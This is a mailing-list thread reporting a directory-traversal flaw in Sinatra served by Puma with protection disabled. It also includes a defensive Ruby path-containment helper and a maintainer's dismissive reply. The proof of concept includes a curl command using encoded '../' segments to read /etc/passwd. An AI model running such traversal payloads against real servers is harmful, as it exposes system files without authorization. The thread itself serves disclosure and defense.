Puma + Sinatra + protection disabled + static files = arbitrary file access via directory traversal
'Mathew Rowley' via sinatrarb
2016-10-03 17:33:17 UTC
When Sinatra is run via Puma, is configured with `protection` disabled, and
hosts static files, a directory traversal bug exists.

POC:
gem install puma sinatra # use puma because webrick throws a Bad URI error
ruby -r sinatra -e "set protection: false, public_folder: Dir.pwd, static: true"
curl http://localhost:4567/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

It looks like this is known[0][1] and the PR comment explains that it does
not introduce a directory traversal bug, however it actually does. It would
be fair to say that the `rack-protection` middleware mitigates this from
being exploited, but if there is a code path to this method that includes a
directory traversal payload, it can be exploited. Yes, it is true that the
default configuration (protection enabled) does prevent this from happening,
however even with protection disabled, should it be possible to access an
arbitrary file via directory traversal?

Mathew Rowley

[0] https://github.com/sinatra/sinatra/pull/779
[1] https://groups.google.com/forum/#!searchin/sinatrarb/traversal%7Csort:relevance/sinatrarb/6Vp3JQd-vzM/LjGsFVspjScJ (Note: lighthouse link dead)
--
You received this message because you are subscribed to the Google Groups "sinatrarb" group.
To unsubscribe from this group and stop receiving emails from it, send an email to sinatrarb+***@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
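The issue the post raises is that the static-file handler trusts a percent-encoded path, so `%2e%2e` segments survive until the filesystem resolves them. The following is an added example of the containment check a static handler should apply before touching the disk; it is not Sinatra's or rack-protection's code, and `safe_static_path` and the `/srv/app/public` root are assumed names.

```ruby
# Added example (not Sinatra's or rack-protection's own code).
# Resolve a requested URL path against a public folder and return the
# absolute file path only if it stays inside that folder; otherwise nil.
def safe_static_path(public_folder, request_path)
  root = File.expand_path(public_folder)

  # Decode percent-encoding first. Checking for ".." on the raw request
  # would miss "%2e%2e", which is exactly what the PoC relies on.
  decoded = request_path.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }

  # An embedded NUL can truncate the path at the OS layer ("a.html%00.png").
  return nil if decoded.include?("\0")

  # File.join drops the request's leading "/", so "/etc/passwd" is treated as
  # relative to root; File.expand_path then collapses "." and ".." segments.
  candidate = File.expand_path(File.join(root, decoded))

  # Accept the root itself or anything strictly below it, compared on the
  # normalised form (a prefix check without the separator would let
  # "/srv/app/public-old/..." through).
  return nil unless candidate == root || candidate.start_with?(root + File::SEPARATOR)
  candidate
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample requests, including the encoded traversal from the post.
  root = "/srv/app/public"
  [
    "/index.html",
    "/css/%2e%2e/app.js",
    "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "/../../etc/passwd",
    "/index.html%00.png",
  ].each do |req|
    verdict = safe_static_path(root, req)
    puts format("%-36s -> %s", req, verdict || "REJECTED")
  end
end
```

The check is the shape of what `rack-protection`'s path-traversal middleware provides for you; the point is that it has to sit in front of the static handler regardless of whether the rest of `protection` is enabled.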
Zachary Scott
2016-10-05 02:25:35 UTC
If disabling the protection that prevents certain attacks makes you
vulnerable to said attacks, it's not a security exploit -- please use
the rack-protection gem.
